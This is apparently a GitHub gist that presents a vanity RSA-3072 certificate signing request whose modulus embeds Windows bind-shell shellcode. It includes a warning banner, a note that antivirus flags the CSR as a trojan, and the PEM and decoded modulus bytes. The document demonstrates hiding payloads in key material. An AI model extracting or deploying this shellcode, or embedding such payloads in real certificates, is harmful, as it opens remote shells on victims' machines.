Skip to content

Instantly share code, notes, and snippets.

@CBonnell
Last active December 5, 2021 00:03
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save CBonnell/699b2c01121e07440e1cf42d0210eba1 to your computer and use it in GitHub Desktop.
Save CBonnell/699b2c01121e07440e1cf42d0210eba1 to your computer and use it in GitHub Desktop.
Vanity RSA key with Windows bind shellcode in modulus
_ _ _, __, _, _ _ _, _ _,
| | / \ |_) |\ | | |\ | / _
|/\| |~| | \ | \| | | \| \ /
~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~
This key is extremely weak and should not be used for anything
Vanity RSA-3072 key with Windows bind shellcode in modulus. DER encoding of the CSR below detected by ClamAV as a trojan: https://www.virustotal.com/gui/file/b757330297ddccd7ec1fdac846dc7a69b1e75541b53ba8b8a508b0370c7b23da/detection
-----BEGIN CERTIFICATE REQUEST-----
MIIDijCCAfICAQAwRTELMAkGA1UEBhMCQVUxEzARBgNVBAgMClNvbWUtU3RhdGUx
ITAfBgNVBAoMGEludGVybmV0IFdpZGdpdHMgUHR5IEx0ZDCCAaIwDQYJKoZIhvcN
AQEBBQADggGPADCCAYoCggGBALt40BHp2tjZdCT0WDHJsVkxWBODwAQDWHcy5FMV
Eer/wJEsi9bplEffo3krHMdMeLLL/W7CnVNZpjfDVxHId3eebfxYuoL5wJo1cn0B
m+cxFoL24omJdWf3qq5ziD/1bT2eqwba/0J6Y2tyWfZYpf4/C0Gg8v4tyTI91FH3
p1b4aQhNJ4ouGZl8/GP6XNWoH6ibiLulPI9/OEXRcTRZhLCXoJnM/n834ijqVwHP
+B4e2NMFZ3P5Mrt2jHwv9ikPpTYuc94xw/6uSWTSOfHyx6AG0/Ya/gr+KL4aQpze
ARYnvSkc+H1HLGgGDiMx/n1Y6Ht2S/7bF1H63/+hvMVmS+ojhke059Vxdy4kSj2x
bxLystBVySMuwqVzssi3fWtVKbwm3fbj9iXGXK2cnRgIO7/S/5IYX0ib4HsDpTIR
JyslzUTbvbnNSNpWTFbVBIdIOmucKhVNvAtWBrXJRtD6aKZ26VIsJGIo4R2HsGaT
hY+HD88WKXYDVQwOPxesAIAAHQIDAQABoAAwDQYJKoZIhvcNAQELBQADggGBAF4t
WtTkpulZcl97KoMpbE5bAyvd8aGTG0rIMzoDx2aMyST7sQD92fSLz+XYEpiTAMH/
0gH+WSX0J/NzQ34sG8mCg05TA4D30SdmnAw9sHbeRgwzoyHJbNHeniXkeLt4kAkX
9BrRs7stZQ5c5NiC+DnClZNZikWew02BROq/YqmoPFsnL5OGYQ4BPA0becSHIlve
XX7WQdf3DHHX+S/uDa2tRf7WeoHdM2A5DO9EEPf7L6oAKFdf+atkM/y8jHD4UDz/
MgeCGAYpumjaS1hovzUAJ4Fh2meZ3C2H9hDny92FOKzbCAIvrC2eIrjn0/HHYSKE
hlInm6MQAF6IrAyxw0sE4muva+XcUFYdq0pjEOaG98iKJ8kcftJbdAwKsdb85r3b
iFFgCMJ2PEEoPnlZmGm+afuL09ls2RBPPOoozob3Pxzw63PgT+ipaXWfR6HjzeMQ
QJk8bAqFw0tE8auNoFKW+o+MLBSCikzNZ9J+dEdlYhJtVTi1nSCj2Z5q856CPg==
-----END CERTIFICATE REQUEST-----
Certificate Request:
Data:
Version: 1 (0x0)
Subject: C = AU, ST = Some-State, O = Internet Widgits Pty Ltd
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (3072 bit)
Modulus:
00:bb:78:d0:11:e9:da:d8:d9:74:24:f4:58:31:c9:
b1:59:31:58:13:83:c0:04:03:58:77:32:e4:53:15:
11:ea:ff:c0:91:2c:8b:d6:e9:94:47:df:a3:79:2b:
1c:c7:4c:78:b2:cb:fd:6e:c2:9d:53:59:a6:37:c3:
57:11:c8:77:77:9e:6d:fc:58:ba:82:f9:c0:9a:35:
72:7d:01:9b:e7:31:16:82:f6:e2:89:89:75:67:f7:
aa:ae:73:88:3f:f5:6d:3d:9e:ab:06:da:ff:42:7a:
63:6b:72:59:f6:58:a5:fe:3f:0b:41:a0:f2:fe:2d:
c9:32:3d:d4:51:f7:a7:56:f8:69:08:4d:27:8a:2e:
19:99:7c:fc:63:fa:5c:d5:a8:1f:a8:9b:88:bb:a5:
3c:8f:7f:38:45:d1:71:34:59:84:b0:97:a0:99:cc:
fe:7f:37:e2:28:ea:57:01:cf:f8:1e:1e:d8:d3:05:
67:73:f9:32:bb:76:8c:7c:2f:f6:29:0f:a5:36:2e:
73:de:31:c3:fe:ae:49:64:d2:39:f1:f2:c7:a0:06:
d3:f6:1a:fe:0a:fe:28:be:1a:42:9c:de:01:16:27:
bd:29:1c:f8:7d:47:2c:68:06:0e:23:31:fe:7d:58:
e8:7b:76:4b:fe:db:17:51:fa:df:ff:a1:bc:c5:66:
4b:ea:23:86:47:b4:e7:d5:71:77:2e:24:4a:3d:b1:
6f:12:f2:b2:d0:55:c9:23:2e:c2:a5:73:b2:c8:b7:
7d:6b:55:29:bc:26:dd:f6:e3:f6:25:c6:5c:ad:9c:
9d:18:08:3b:bf:d2:ff:92:18:5f:48:9b:e0:7b:03:
a5:32:11:27:2b:25:cd:44:db:bd:b9:cd:48:da:56:
4c:56:d5:04:87:48:3a:6b:9c:2a:15:4d:bc:0b:56:
06:b5:c9:46:d0:fa:68:a6:76:e9:52:2c:24:62:28:
e1:1d:87:b0:66:93:85:8f:87:0f:cf:16:29:76:03:
55:0c:0e:3f:17:ac:00:80:00:1d
Exponent: 65537 (0x10001)
Attributes:
a0:00
Signature Algorithm: sha256WithRSAEncryption
5e:2d:5a:d4:e4:a6:e9:59:72:5f:7b:2a:83:29:6c:4e:5b:03:
2b:dd:f1:a1:93:1b:4a:c8:33:3a:03:c7:66:8c:c9:24:fb:b1:
00:fd:d9:f4:8b:cf:e5:d8:12:98:93:00:c1:ff:d2:01:fe:59:
25:f4:27:f3:73:43:7e:2c:1b:c9:82:83:4e:53:03:80:f7:d1:
27:66:9c:0c:3d:b0:76:de:46:0c:33:a3:21:c9:6c:d1:de:9e:
25:e4:78:bb:78:90:09:17:f4:1a:d1:b3:bb:2d:65:0e:5c:e4:
d8:82:f8:39:c2:95:93:59:8a:45:9e:c3:4d:81:44:ea:bf:62:
a9:a8:3c:5b:27:2f:93:86:61:0e:01:3c:0d:1b:79:c4:87:22:
5b:de:5d:7e:d6:41:d7:f7:0c:71:d7:f9:2f:ee:0d:ad:ad:45:
fe:d6:7a:81:dd:33:60:39:0c:ef:44:10:f7:fb:2f:aa:00:28:
57:5f:f9:ab:64:33:fc:bc:8c:70:f8:50:3c:ff:32:07:82:18:
06:29:ba:68:da:4b:58:68:bf:35:00:27:81:61:da:67:99:dc:
2d:87:f6:10:e7:cb:dd:85:38:ac:db:08:02:2f:ac:2d:9e:22:
b8:e7:d3:f1:c7:61:22:84:86:52:27:9b:a3:10:00:5e:88:ac:
0c:b1:c3:4b:04:e2:6b:af:6b:e5:dc:50:56:1d:ab:4a:63:10:
e6:86:f7:c8:8a:27:c9:1c:7e:d2:5b:74:0c:0a:b1:d6:fc:e6:
bd:db:88:51:60:08:c2:76:3c:41:28:3e:79:59:98:69:be:69:
fb:8b:d3:d9:6c:d9:10:4f:3c:ea:28:ce:86:f7:3f:1c:f0:eb:
73:e0:4f:e8:a9:69:75:9f:47:a1:e3:cd:e3:10:40:99:3c:6c:
0a:85:c3:4b:44:f1:ab:8d:a0:52:96:fa:8f:8c:2c:14:82:8a:
4c:cd:67:d2:7e:74:47:65:62:12:6d:55:38:b5:9d:20:a3:d9:
9e:6a:f3:9e:82:3e
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment